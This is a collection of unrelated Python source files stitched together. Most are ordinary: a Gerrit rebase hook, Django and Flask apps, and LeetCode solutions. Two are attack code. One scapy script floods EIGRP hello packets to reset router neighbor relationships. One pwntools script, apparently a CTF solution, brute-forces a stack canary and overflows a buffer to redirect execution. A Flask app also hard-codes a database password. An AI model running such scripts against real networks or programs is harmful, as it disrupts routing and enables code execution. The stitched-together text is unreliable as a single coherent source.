# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This script is designed to detect when a patchset uploaded to Gerrit is
# 'identical' (determined via git-patch-id) and reapply reviews onto the new
# patchset from the previous patchset.
# Get usage and help info by running: ./trivial_rebase.py --help
# Documentation is available here: https://www.codeaurora.org/xwiki/bin/QAEP/Gerrit
import json
from optparse import OptionParser
import subprocess
from sys import exit
class CheckCallError(OSError):
  """Raised when CheckCall() returns a non-zero exit code.

  Keeps the full context of the failed invocation on the exception.
  """

  def __init__(self, command, cwd, retcode, stdout, stderr=None):
    OSError.__init__(self, command, cwd, retcode, stdout, stderr)
    self.command = command
    self.cwd = cwd
    self.retcode = retcode
    self.stdout = stdout
    self.stderr = stderr
def CheckCall(command, cwd=None):
  """Like subprocess.check_call() but returns (stdout, stderr).

  Raises CheckCallError when the command cannot be spawned or exits
  non-zero.  Updated to the 'except ... as e' form, which works on
  python 2.6+ (matching the script's shebang) and python 3; the old
  'except E, e' comma form was python-2-only.
  """
  try:
    process = subprocess.Popen(command, cwd=cwd, stdout=subprocess.PIPE)
    std_out, std_err = process.communicate()
  except OSError as e:
    raise CheckCallError(command, cwd, e.errno, None)
  if process.returncode:
    raise CheckCallError(command, cwd, process.returncode, std_out, std_err)
  return std_out, std_err
def GsqlQuery(sql_query, server, port):
  """Runs a gerrit gsql query and returns the result.

  Executes the query over ssh with JSON output; returns a list of
  JSON-document strings, one per result row (plus a trailing stats entry).
  Note: python-2 syntax ('except E, e', print statements) — this file
  targets python 2.6 per its shebang.
  """
  gsql_cmd = ['ssh', '-p', port, server, 'gerrit', 'gsql', '--format',
              'JSON', '-c', sql_query]
  try:
    (gsql_out, gsql_stderr) = CheckCall(gsql_cmd)
  except CheckCallError, e:
    print "return code is %s" % e.retcode
    print "stdout and stderr is\n%s%s" % (e.stdout, e.stderr)
    raise
  # Each JSON document ends with '}}'; insert a marker there so the raw
  # stream can be split into one string per document.
  new_out = gsql_out.replace('}}\n', '}}\nsplit here\n')
  return new_out.split('split here\n')
def FindPrevRev(changeId, patchset, server, port):
  """Return the revision hash of patch set (patchset - 1) on *changeId*."""
  prev_patchset = patchset - 1
  sql_query = ("\"SELECT revision FROM patch_sets,changes WHERE "
               "patch_sets.change_id = changes.change_id AND "
               "patch_sets.patch_set_id = %s AND "
               "changes.change_key = \'%s\'\"" % (prev_patchset, changeId))
  rows = GsqlQuery(sql_query, server, port)
  first_row = json.loads(rows[0], strict=False)
  return first_row["columns"]["revision"]
def GetApprovals(changeId, patchset, server, port):
  """Get all the approvals on patch set (patchset - 1) of *changeId*.

  Returns a list of approval dicts (the 'columns' of each 'row' entry).
  Fix: the loop variable previously shadowed the builtin 'dict'.
  """
  sql_query = ("\"SELECT value,account_id,category_id FROM patch_set_approvals "
               "WHERE patch_set_id = %s AND change_id = (SELECT change_id FROM "
               "changes WHERE change_key = \'%s\') AND value <> 0\""
               % ((patchset - 1), changeId))
  gsql_out = GsqlQuery(sql_query, server, port)
  approvals = []
  for json_str in gsql_out:
    # Only 'row' entries carry data; the trailing stats entry is skipped.
    record = json.loads(json_str, strict=False)
    if record["type"] == "row":
      approvals.append(record["columns"])
  return approvals
def GetEmailFromAcctId(account_id, server, port):
  """Returns the preferred email address associated with the account_id"""
  query = ("\"SELECT preferred_email FROM accounts WHERE account_id = %s\""
           % account_id)
  rows = GsqlQuery(query, server, port)
  return json.loads(rows[0], strict=False)["columns"]["preferred_email"]
def GetPatchId(revision):
  """Return `git patch-id` output for the given revision.

  Feeds the full `git show <revision>` output into `git patch-id` and
  returns patch-id's stdout (the patch id followed by the commit id).
  """
  show_out = subprocess.Popen(['git', 'show', revision],
                              stdout=subprocess.PIPE).communicate()[0]
  patch_id_proc = subprocess.Popen(['git', 'patch-id'],
                                   stdout=subprocess.PIPE,
                                   stdin=subprocess.PIPE)
  return patch_id_proc.communicate(show_out)[0]
def SuExec(server, port, private_key, as_user, cmd):
  """Run `cmd` on the Gerrit server while impersonating `as_user`.

  Uses Gerrit's `suexec` over ssh, authenticating as the special
  "Gerrit Code Review" user with the daemon's private host key.
  """
  suexec_cmd = ['ssh', '-l', "Gerrit Code Review", '-p', port, server, '-i',
                private_key, 'suexec', '--as', as_user, '--', cmd]
  CheckCall(suexec_cmd)
def DiffCommitMessages(commit1, commit2):
  """Return True if the two commits' author/message text differs.

  Compares `git log` output (author name/email, subject, body) for exactly
  one commit each (the `<rev>^!` range syntax).

  Args:
    commit1: first commit-ish.
    commit2: second commit-ish.

  Returns:
    True when the logs differ, False when identical.
  """
  log_cmd1 = ['git', 'log', '--pretty=format:"%an %ae%n%s%n%b"',
              commit1 + '^!']
  commit1_log = CheckCall(log_cmd1)
  log_cmd2 = ['git', 'log', '--pretty=format:"%an %ae%n%s%n%b"',
              commit2 + '^!']
  commit2_log = CheckCall(log_cmd2)
  # Direct comparison replaces the old `if ...: return True / return False`.
  return commit1_log != commit2_log
def Main():
  """Gerrit hook entry point: detect a trivial rebase and restore approvals.

  If the new patch set has the same git patch-id as the previous one, the
  change was only rebased (or its commit message edited): re-apply the
  previous code-review scores via suexec, skipping verifications and
  submit attempts.
  """
  server = 'localhost'
  usage = "usage: %prog <required options> [--server-port=PORT]"
  parser = OptionParser(usage=usage)
  parser.add_option("--change", dest="changeId", help="Change identifier")
  parser.add_option("--project", help="Project path in Gerrit")
  parser.add_option("--commit", help="Git commit-ish for this patchset")
  parser.add_option("--patchset", type="int", help="The patchset number")
  parser.add_option("--private-key-path", dest="private_key_path",
                    help="Full path to Gerrit SSH daemon's private host key")
  parser.add_option("--server-port", dest="port", default='29418',
                    help="Port to connect to Gerrit's SSH daemon "
                         "[default: %default]")
  (options, args) = parser.parse_args()
  if not options.changeId:
    parser.print_help()
    exit(0)
  if options.patchset == 1:
    # Nothing to detect on first patchset
    exit(0)
  prev_revision = None
  prev_revision = FindPrevRev(options.changeId, options.patchset, server,
                              options.port)
  if not prev_revision:
    # Couldn't find a previous revision
    exit(0)
  prev_patch_id = GetPatchId(prev_revision)
  cur_patch_id = GetPatchId(options.commit)
  # `git patch-id` prints "<patch-id> <commit-id>"; compare only the first.
  if cur_patch_id.split()[0] != prev_patch_id.split()[0]:
    # patch-ids don't match
    exit(0)
  # Patch ids match. This is a trivial rebase.
  # In addition to patch-id we should check if the commit message changed. Most
  # approvers would want to re-review changes when the commit message changes.
  changed = DiffCommitMessages(prev_revision, options.commit)
  if changed:
    # Insert a comment into the change letting the approvers know only the
    # commit message changed
    comment_msg = ("\'--message=New patchset patch-id matches previous patchset"
                   ", but commit message has changed.'")
    comment_cmd = ['ssh', '-p', options.port, server, 'gerrit', 'approve',
                   '--project', options.project, comment_msg, options.commit]
    CheckCall(comment_cmd)
    exit(0)
  # Need to get all approvals on prior patch set, then suexec them onto
  # this patchset.
  approvals = GetApprovals(options.changeId, options.patchset, server,
                           options.port)
  gerrit_approve_msg = ("\'Automatically re-added by Gerrit trivial rebase "
                        "detection script.\'")
  for approval in approvals:
    # Note: Sites with different 'copy_min_score' values in the
    # approval_categories DB table might want different behavior here.
    # Additional categories should also be added if desired.
    if approval["category_id"] == "CRVW":
      approve_category = '--code-review'
    elif approval["category_id"] == "VRIF":
      # Don't re-add verifies
      #approve_category = '--verified'
      continue
    elif approval["category_id"] == "SUBM":
      # We don't care about previous submit attempts
      continue
    else:
      print "Unsupported category: %s" % approval
      exit(0)
    score = approval["value"]
    gerrit_approve_cmd = ['gerrit', 'approve', '--project', options.project,
                          '--message', gerrit_approve_msg, approve_category,
                          score, options.commit]
    # Impersonate the original approver so the score is attributed to them.
    email_addr = GetEmailFromAcctId(approval["account_id"], server,
                                    options.port)
    SuExec(server, options.port, options.private_key_path, email_addr,
           ' '.join(gerrit_approve_cmd))
  exit(0)
if __name__ == "__main__":
  Main()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class DeviceInfo(models.Model):
    """A registered hardware device and the gateway it is attached to."""
    # Device category/type code.
    dtype=models.CharField(max_length=12)
    # Human-readable device name; default is the vendor name in Chinese.
    dname=models.CharField(max_length=16,default='环泰设备')
    # Device MAC address stored as text.
    dmac=models.CharField(max_length=40)
    dbrand = models.CharField(max_length=20,default='')
    gcontrolcode = models.CharField(max_length=10, default='')
    # NOTE(review): no on_delete argument -- pre-Django-2.0 style; confirm
    # the project's Django version before upgrading.
    ggateway = models.ForeignKey('sc_gateway.GatewayInfo')
|
# 筛选淘汰(过滤规则在这里修改)
from CalobjValue import decodechrom
def calfitValue(pop, chrom_length, max_value):
    """
    Constraint filtering: keep only individuals whose two chromosomes
    both decode to a non-zero value.

    :param pop: population (list of [chrom0, chrom1] pairs)
    :param chrom_length: gene encoding length
    :param max_value: maximum decoded value
    :return: filtered population
    """
    return [
        ind for ind in pop
        if decodechrom(ind[0], chrom_length, max_value) != 0
        and decodechrom(ind[1], chrom_length, max_value) != 0
    ]
def boolcondition(x):
    """Return True if any gene position holds a 1 in either chromosome of x.

    Iterates positions of x[0] and checks the same index in x[1], exactly
    like the original flag-based loop.
    """
    return any(x[0][i] == 1 or x[1][i] == 1 for i in range(len(x[0])))
|
# Python 2 script: read numbers until the user stops answering "si",
# then print the largest value seen.
max=-30000000  # running maximum; NOTE(review): shadows the builtin `max`
r="si"
while r=="si" :
    valor = float (raw_input("Ingrese Valor:"))
    if valor>max :
        max=valor
    r=raw_input("Hay mas datos:")
# NOTE(review): this prints the value before the label
# ("<value> el mayor es:") -- the operands look swapped; confirm intent.
print max, "el mayor es:"
from django.urls import path
from .views import contact_info,send
# URL namespace, used when reversing e.g. "contact:contact".
app_name='contact'
urlpatterns = [
    # Contact page (form / info view).
    path('',contact_info,name='contact'),
    # Confirmation page shown after the message is sent.
    path('sent/',send,name='sent'),
]
|
# 输入一棵二叉树的根节点,判断该树是不是平衡二叉树。如果某二叉树中任意节点的左右子树的深度相差不超过1,那么它就是一棵平衡二叉树。
#
#
#
# 示例 1:
#
# 给定二叉树 [3,9,20,null,null,15,7]
#
# 3
# / \
# 9 20
# / \
# 15 7
# 返回 true 。
#
# 示例 2:
#
# 给定二叉树 [1,2,2,3,3,null,null,4,4]
#
# 1
# / \
# 2 2
# / \
# 3 3
# / \
# 4 4
# 返回 false 。
#
#
#
# 限制:
#
# 1 <= 树的结点个数 <= 10000
# 注意:本题与主站 110 题相同:https://leetcode-cn.com/problems/balanced-binary-tree/
#
#
#
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/ping-heng-er-cha-shu-lcof
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# Definition for a binary tree node.
class TreeNode:
    """A binary tree node holding a value and optional left/right children."""
    def __init__(self, x):
        self.val = x
        self.left = self.right = None
class Solution:
    """Check whether a binary tree is height-balanced (LCOF 55-II / LC 110)."""

    def treeHeight(self, root: "TreeNode") -> int:
        """Return the height of the tree rooted at `root` (0 for None)."""
        if not root:
            return 0
        return max(self.treeHeight(root.left), self.treeHeight(root.right)) + 1

    def _balanced_height(self, root: "TreeNode") -> int:
        """Return the height of `root`, or -1 if its subtree is unbalanced.

        Bottom-up traversal: each node is visited once, making the whole
        check O(n) instead of the O(n^2) of calling treeHeight per node.
        """
        if not root:
            return 0
        left = self._balanced_height(root.left)
        if left < 0:
            return -1
        right = self._balanced_height(root.right)
        if right < 0:
            return -1
        if abs(left - right) > 1:
            return -1
        return max(left, right) + 1

    def isBalanced(self, root: "TreeNode") -> bool:
        """True iff every node's subtree heights differ by at most 1."""
        return self._balanced_height(root) >= 0
#!/usr/bin/env python3
#Import time so we can set a sleep timer
import time
#Import scapy
from scapy.all import *
#Import EIGRP
load_contrib('eigrp')
#Create a loop
# Sends 50 crafted EIGRP hellos (one per second) to the EIGRP multicast
# address 224.0.0.10 -- per the script's own comments this resets neighbor
# relationships. Lab/testing use only.
for i in range (0, 50):
    #Send EIGRP packet to reset neighbor relationships.
    #Change the source IP address (src) to the correct IP address
    #Change Autonomous System number (asn) to the correct number
    sendp(Ether()/IP(src="192.168.122.171",dst="224.0.0.10")/EIGRP(asn=100,
    tlvlist=[EIGRPParam(k1=255, k2=255, k3=255, k4=255, k5=255),EIGRPSwVer()]))
    #Add a one second delay
    time.sleep(1)
#Credits:
#Warning: You visit any sites listed at your own risk.
#https://scapy.readthedocs.io/_/downloads/en/latest/pdf/
#https://scapy.ml.secdev.narkive.com/mKiGyM29/scapy-eigrp-layer-use-cases
|
from flask import Flask, render_template, request, session, copy_current_request_context
from DBcm import UseDataBase, ConnectionError, CredentialError, SQLError
app1 = Flask(__name__)
# Database connection settings consumed by UseDataBase in every view below.
# NOTE(review): credentials are hard-coded; consider environment variables.
app1.config['dbconfig'] = {'host': '127.0.0.1',
                           'user': 'root',
                           'password': '228sanya228',
                           'database': 'subdbd', }
@app1.route('/')
@app1.route('/main')
def main():
    """Landing page: renders the static start template."""
    return render_template('start.html', )
@app1.route('/regions')
def regions():
    """List all firm regions in a table.

    Returns the rendered regions page, or the string 'Error' when the
    database lookup fails.
    """
    try:
        with UseDataBase(app1.config['dbconfig']) as cursor:
            _SQL = """select id, region_name
            from firm_region"""
            cursor.execute(_SQL)
            contents = cursor.fetchall()
            titles = ('ID', 'Регион')
            return render_template('regions.html',
                                   the_title='Регионы',
                                   row_titles=titles,
                                   the_data=contents, )
    except ConnectionError as err:
        print('Trouble with SQL-server', str(err))
    except CredentialError as err:
        print('User-id/Password issues. Error:', str(err))
    except SQLError as err:
        print('Is your query correct? Error: ', str(err))
    except Exception as err:
        print('Something went wrong:', str(err))
    # Bug fix: previously only the generic Exception branch returned a value;
    # the specific handlers fell through and the view returned None, which
    # Flask rejects. All error paths now fall through to 'Error'.
    return 'Error'
@app1.route('/firm')
def firms():
    """List all firms; returns 'Error' on any database failure."""
    try:
        with UseDataBase(app1.config['dbconfig']) as cursor:
            _SQL = """select id, id_region, firm_name, firm_info
            from firm""" # CHANGEEEE for id_reg = name_reg
            cursor.execute(_SQL)
            contents = cursor.fetchall()
            titles = ('ID', 'Регион', 'Название фирмы', 'Информация')
            return render_template('firm.html',
                                   the_title='Фирмы',
                                   row_titles=titles,
                                   the_data=contents, )
    except ConnectionError as err:
        print('Trouble with SQL-server', str(err))
    except CredentialError as err:
        print('User-id/Password issues. Error:', str(err))
    except SQLError as err:
        print('Is your query correct? Error: ', str(err))
    except Exception as err:
        print('Something went wrong:', str(err))
    # Bug fix: all error paths now return 'Error' (previously only the
    # generic Exception branch did, the rest returned None).
    return 'Error'
@app1.route('/firmservice')
def firmservice():
    """List firm/service associations; returns 'Error' on DB failure."""
    try:
        with UseDataBase(app1.config['dbconfig']) as cursor:
            _SQL = """select id_firm, id_service
            from firm_service""" # CHANGEEEE
            # for id_firm(service) = firm_name
            cursor.execute(_SQL)
            contents = cursor.fetchall()
            titles = ('Фирма', 'Услуга')
            return render_template('firmservice.html',
                                   the_title='Услуги фирм',
                                   row_titles=titles,
                                   the_data=contents, )
    except ConnectionError as err:
        print('Trouble with SQL-server', str(err))
    except CredentialError as err:
        print('User-id/Password issues. Error:', str(err))
    except SQLError as err:
        print('Is your query correct? Error: ', str(err))
    except Exception as err:
        print('Something went wrong:', str(err))
    # Bug fix: all error paths now return 'Error' (previously only the
    # generic Exception branch did, the rest returned None).
    return 'Error'
@app1.route('/services')
def services():
    """List all services; returns 'Error' on any database failure."""
    try:
        with UseDataBase(app1.config['dbconfig']) as cursor:
            _SQL = """select id, service_name
            from services"""
            cursor.execute(_SQL)
            contents = cursor.fetchall()
            titles = ('ID услуги', 'Услуга')
            return render_template('services.html',
                                   the_title='Услуги',
                                   row_titles=titles,
                                   the_data=contents, )
    except ConnectionError as err:
        print('Trouble with SQL-server', str(err))
    except CredentialError as err:
        print('User-id/Password issues. Error:', str(err))
    except SQLError as err:
        print('Is your query correct? Error: ', str(err))
    except Exception as err:
        print('Something went wrong:', str(err))
    # Bug fix: all error paths now return 'Error' (previously only the
    # generic Exception branch did, the rest returned None).
    return 'Error'
################
# ADD REGION #
################
@app1.route('/addreg')
def show_addreg():
    """Render the add-region form."""
    return render_template('addreg.html')
@app1.route('/regions', methods=['POST'])
def addregion():
    """Insert a new region from the submitted form, then re-render the list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """insert into firm_region
        (id, region_name)
        values
        (%s, %s)"""
        cursor.execute(_SQL, (request.form['id_reg'],
                              request.form['name_reg'],
                              ))
    return regions()
################
# ADD FIRM #
################
@app1.route('/addfirm')
def show_addfirm():
    """Render the add-firm form."""
    return render_template('addfirm.html')
@app1.route('/firm', methods=['POST'])
def addfirm():
    """Insert a new firm from the submitted form, then re-render the list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """insert into firm
        (id, id_region, firm_name, firm_info)
        values
        (%s, %s, %s, %s)"""
        cursor.execute(_SQL, (request.form['id_firm'],
                              request.form['id_region'],
                              request.form['firm_name'],
                              request.form['firm_info'],
                              ))
    return firms()
########################
# ADD FIRM SERVICE #
########################
@app1.route('/addfirmservice')
def show_addfirmservice():
    """Render the add-firm-service form."""
    return render_template('addfirmservice.html')
@app1.route('/firmservice', methods=['POST'])
def addfirmservice():
    """Link a firm to a service, then re-render the association list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """insert into firm_service
        (id_firm, id_service)
        values
        (%s, %s)"""
        cursor.execute(_SQL, (request.form['id_firm'],
                              request.form['id_service'],
                              ))
    return firmservice()
########################
# ADD SERVICE #
########################
@app1.route('/addservices')
def show_addservices():
    """Render the add-service form."""
    return render_template('addservices.html')
@app1.route('/services', methods=['POST'])
def addservices():
    """Insert a new service from the form, then re-render the service list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """insert into services
        (id, service_name)
        values
        (%s, %s)"""
        cursor.execute(_SQL, (request.form['id_service'],
                              request.form['service_name'],
                              ))
    return services()
########################
# DELETE REGION #
########################
@app1.route('/chooseid')
def show_choose_id():
    """Render the form asking which region id to delete."""
    return render_template('chooseid.html')
@app1.route('/delregions', methods=['POST'])
def show_delregion():
    """Delete the region with the submitted id, then re-render the list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """delete from firm_region where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
    return regions()
########################
# DELETE FIRM #
########################
@app1.route('/chooseidfirm')
def show_choose_id_firm():
    """Render the form asking which firm id to delete."""
    return render_template('chooseidfirm.html')
@app1.route('/delfirm', methods=['POST'])
def show_delfirm():
    """Delete the firm with the submitted id, then re-render the list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """delete from firm where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
    return firms()
########################
# DELETE FIRMSERVICE #
########################
@app1.route('/chooseidfirmservice')
def show_choose_id_firmservice():
    """Render the form asking which firm/service pair to delete."""
    return render_template('chooseidfirmservice.html')
@app1.route('/delfirmservice', methods=['POST'])
def show_delfirmservice():
    """Delete one firm/service association, then re-render the list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """delete from firm_service where id_firm=%(my_id_firm)s and id_service=%(my_id_service)s"""
        cursor.execute(_SQL, {'my_id_firm': request.form['id_edit_del_firm'],
                              'my_id_service': request.form['id_edit_del_service']
                              })
    return firmservice()
########################
# DELETE SERVICE #
########################
@app1.route('/chooseidservice')
def show_choose_id_service():
    """Render the form asking which service id to delete."""
    return render_template('chooseidservice.html')
@app1.route('/delservice', methods=['POST'])
def show_delservice():
    """Delete the service with the submitted id, then re-render the list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """delete from services where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
    return services()
########################
# EDIT REGION #
########################
@app1.route('/editregion')
def show_chooseregion():
    """Render the form asking which region id to edit."""
    return render_template('chooseidedit.html',
                           )
@app1.route('/editregions', methods=['POST'])
def show_editregion():
    """Load the chosen region and render the pre-filled edit form."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """select * from firm_region where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
        contents = cursor.fetchall()
    # NOTE(review): contents[0] raises IndexError for an unknown id.
    return render_template('editreg.html',
                           id_reg=contents[0][0],
                           reg_name=contents[0][1]
                           )
@app1.route('/editedregions', methods=['POST'])
def show_editedregion():
    """Apply the edited region name, then re-render the region list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """update firm_region set region_name=%(my_name)s where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_reg'],
                              'my_name': request.form['name_reg']})
    return regions()
########################
# EDIT FIRM #
########################
@app1.route('/editfirm')
def show_choosefirm():
    """Render the form asking which firm id to edit."""
    return render_template('chooseideditfirm.html',
                           )
@app1.route('/editfirms', methods=['POST'])
def show_editfirm():
    """Load the chosen firm and render the pre-filled edit form."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """select * from firm where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
        contents = cursor.fetchall()
    # NOTE(review): contents[0] raises IndexError for an unknown id.
    return render_template('editfirm.html',
                           id_firm=contents[0][0],
                           id_reg=contents[0][1],
                           firm_name=contents[0][2],
                           firm_info=contents[0][3]
                           )
@app1.route('/editedfirms', methods=['POST'])
def show_editedfirm():
    """Apply the edited firm fields, then re-render the firm list."""
    # NOTE(review): form field names here (id, id_reg, info_firm, name_firm)
    # differ from the add-firm form (id_firm, id_region, ...); they must
    # match editfirm.html exactly.
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """update firm
        set id_region=%(my_id_reg)s, firm_name=%(my_name)s, firm_info=%(my_info)s
        where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id'],
                              'my_id_reg': request.form['id_reg'],
                              'my_info': request.form['info_firm'],
                              'my_name': request.form['name_firm']})
    return firms()
########################
# EDIT SERVICES #
########################
@app1.route('/editservice')
def show_chooseservice():
    """Render the form asking which service id to edit."""
    return render_template('chooseideditservice.html',
                           )
@app1.route('/editservices', methods=['POST'])
def show_editservice():
    """Load the chosen service and render the pre-filled edit form."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """select * from services where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
        contents = cursor.fetchall()
    # NOTE(review): contents[0] raises IndexError for an unknown id.
    return render_template('editservice.html',
                           id_service=contents[0][0],
                           name_service=contents[0][1],
                           )
@app1.route('/editedservices', methods=['POST'])
def show_editedservice():
    """Apply the edited service name, then re-render the service list."""
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL = """update services
        set service_name=%(my_name)s
        where id=%(my_id)s"""
        cursor.execute(_SQL, {'my_id': request.form['id_service'],
                              'my_name': request.form['name_service']})
    return services()
########################
# SEARCHING #
########################
@app1.route('/searching')
def searching():
    """Render the search form (region name + service name)."""
    return render_template('search.html',
                           )
@app1.route('/searched', methods=['POST'])
def searched():
    """Find firms in the requested region that offer the requested service.

    Resolves the region and service names to ids, joins the three tables,
    and renders one row per matching firm.
    NOTE(review): an unknown region/service name makes fetchall()[0]
    raise IndexError -- confirm the form constrains its inputs.
    """
    with UseDataBase(app1.config['dbconfig']) as cursor:
        _SQL1 = """select id
        from firm_region
        where region_name=%(reg_name)s"""
        cursor.execute(_SQL1, {'reg_name': request.form['reg_name']})
        id_reg = cursor.fetchall()[0][0]
        _SQL2 = """select id
        from services
        where service_name=%(serv_name)s"""
        cursor.execute(_SQL2, {'serv_name': request.form['service_name']})
        id_serv = cursor.fetchall()[0][0]
        _SQL = """select *
        from firm f, firm_region r, firm_service fs
        where f.id_region=%(id_reg)s and fs.id_service=%(id_serv)s
        and r.id=f.id_region and fs.id_firm=f.id"""
        cursor.execute(_SQL, {'id_serv': str(id_serv), 'id_reg': str(id_reg)})
        found = cursor.fetchall()
    # Shape each joined row as [firm name, region, service, firm info].
    rows = [
        [row[2], request.form['reg_name'], request.form['service_name'], row[3]]
        for row in found
    ]
    titles = ('Название фирмы', 'Регион', 'Услуга', 'Информация о фирме')
    return render_template('searched.html',
                           the_title='Найденные фирмы',
                           row_titles=titles,
                           the_data=rows, )
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app1.run()
|
#Given an array nums and a value val, remove all instances
#of that value in-place and return the new length.
#Do not allocate extra space for another array, you must do this by
#modifying the input array in-place with O(1) extra memory.
#The order of elements can be changed. It doesn't matter what you leave beyond
#the new length.
def remove(nums, val):
    """Remove all occurrences of `val` from `nums` in place.

    Classic two-pointer compaction: elements != val are moved to the front
    of the list; anything past the returned length is leftover data (the
    problem statement allows this).

    Args:
        nums: list to filter in place (may be empty).
        val: value to remove.

    Returns:
        The new logical length of `nums`.
    """
    # The old special cases for len 0/1 were redundant -- the general loop
    # already handles them -- so they have been removed.
    write = 0
    for item in nums:
        if item != val:
            nums[write] = item
            write += 1
    return write
#print(remove([3,2,2,3], 3))
# Demo run; prints the count of elements left after removing every 2 (4 here).
print(remove([0,1,2,2,3,0,2], 2))
|
import sys, os
# Temporarily make the "D" subdirectory both the working directory and an
# import root so kbqa_main (which presumably relies on relative paths --
# confirm) can be imported; then restore the original state.
path = os.getcwd()
os.chdir('D')
sys.path.append(os.path.join(path, "D"))
import kbqa_main
os.chdir('..')
sys.path.remove(os.path.join(path, "D"))
|
#!/usr/bin/python
import json
import pymysql
def json_serial(obj):
    """json.dumps fallback: stringify anything not natively serializable."""
    return str(obj)
# CGI script: report the most recent row of every configured table as JSON.
result = {"error": "unknown"}
try:
    # Table names to report come from a local JSON config file.
    with open("charge-controller.json", mode="r", encoding="utf-8") as data:
        chargeController = json.load(data)
    # DB credentials live in a separate local JSON file.
    with open("db-config.json", "r") as f:
        db = json.load(f)
    conn = pymysql.connect(
        db=db["db"],
        user=db["user"],
        password=db["password"],
        host=db["host"]
    )
    c = conn.cursor()
    result = {}
    for tableName in chargeController["data"]:
        rowResult = {}
        # NOTE(review): the table name is interpolated into the SQL string --
        # identifiers cannot be bound as parameters, so this is safe only as
        # long as charge-controller.json is trusted.
        sql = "SELECT * FROM %s where unit = 1 ORDER BY create_date DESC LIMIT 1" % tableName
        c.execute(sql)
        row = c.fetchone()
        fields = []
        for field in c.description:
            fields.append(field[0])
        # Pair column names with the latest row's values.
        for i in range(len(fields)):
            rowResult[fields[i]] = row[i]
        result[tableName] = rowResult
    conn.commit()
    c.close()
except Exception as e:
    # Any failure is reported in the JSON body; type(e) is stringified by
    # json_serial below.
    result = {"error": str(e), "type": type(e)}
# Minimal CGI response: header, blank line, JSON body.
print("Content-Type: application/json")
print()
print(json.dumps(result, default=json_serial, sort_keys = True, indent = 2))
|
from flask import Flask
from flask import render_template
from flask import request
import neuroid
app = Flask(__name__)
@app.route('/')
def index():
    """Serve the parameter-input form page."""
    return render_template("index.html")
@app.route("/input", methods=["POST"])
# NOTE(review): the function name shadows the builtin input(); renaming it
# would also rename the Flask endpoint, so it is only flagged here.
def input():
    """Read simulation parameters from the form, run neuroid, render results."""
    umbr = float(request.form["umbrValue"])
    beta = float(request.form["BetaValue"])
    kr = float(request.form["KrValue"])
    maxcount = int(request.form["maxcountValue"])
    result = neuroid.run(umbr, beta, kr, maxcount)
    return render_template('index.html', results=result)
|
from pycep_correios import get_address_from_cep, WebService
pergunta = input('Digite seu cep:\n')
# Validate the data supplied by the user: keep asking until the CEP has
# exactly 8 characters.
# NOTE(review): only the length is checked -- 8 letters would pass; a
# digits-only check (str.isdigit) may be intended.
valida_dados = len(pergunta)
while(valida_dados != 8):
    print('Cep incorrreto\n')
    pergunta = input('Digite seu cep novamente\n')
    valida_dados = len(pergunta)
|
#!/usr/bin/env python
from pwn import *
import string
# Python 2 exploit script (string.letters and the print statements in the
# commented brute-force loop below are Python 2 only).
pico = 0
# Canary bytes recovered so far by the (now commented-out) byte-at-a-time
# brute force below.
known_canary = 'IHwj'
check = string.letters + "0123456789"
# for char in check:
#     if pico:
#         r = process("./vuln")
#     else:
#         #env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./pico32.libc.so.6")}
#         r = process("./bof3")
#         # gdb.attach(r, '''
#         # b *0x8048868
#         # c
#         # ''')
#     payload = ''
#     payload += '80\n'
#     payload += 'A'*32
#     payload += known_canary
#     payload += char
#     log.info("Testing canary " + known_canary + char)
#     r.send(payload)
#     output = r.recvall()
#     print "output: " + output
#     if "Smashing" not in output:
#         known_canary += char
#         print 'Canary: ' + known_canary
#         # if len(known_canary) == 4:
#         #     print 'Canary: ' + known_canary
# print 'Canary: ' + known_canary
if pico:
    r = process("./vuln")
else:
    #env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./pico32.libc.so.6")}
    r = process("./bof3")
gdb.attach(r, '''
b *0x80488b1
c
''')
# Final payload: overflow up to the canary, replay the recovered canary,
# pad to the saved return address, then jump to the win function.
WIN = 0x80486eb
payload = ''
payload += '80\n'
payload += 'A'*32
payload += known_canary
payload += 'A'*16
payload += p32(WIN)
r.send(payload)
r.interactive()
from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
# Register your models here.
from .models import Meals,Category
class MealsAdmin(SummernoteModelAdmin,admin.ModelAdmin): # instead of ModelAdmin
    """Admin for Meals with Summernote rich-text editing on all fields."""
    summernote_fields = '__all__'
    # NOTE(review): 'preperation_time' is misspelled but must match the model
    # field name exactly -- verify against the Meals model before renaming.
    list_display = ['name', 'preperation_time' ,'price']
    search_fields=['name','price']
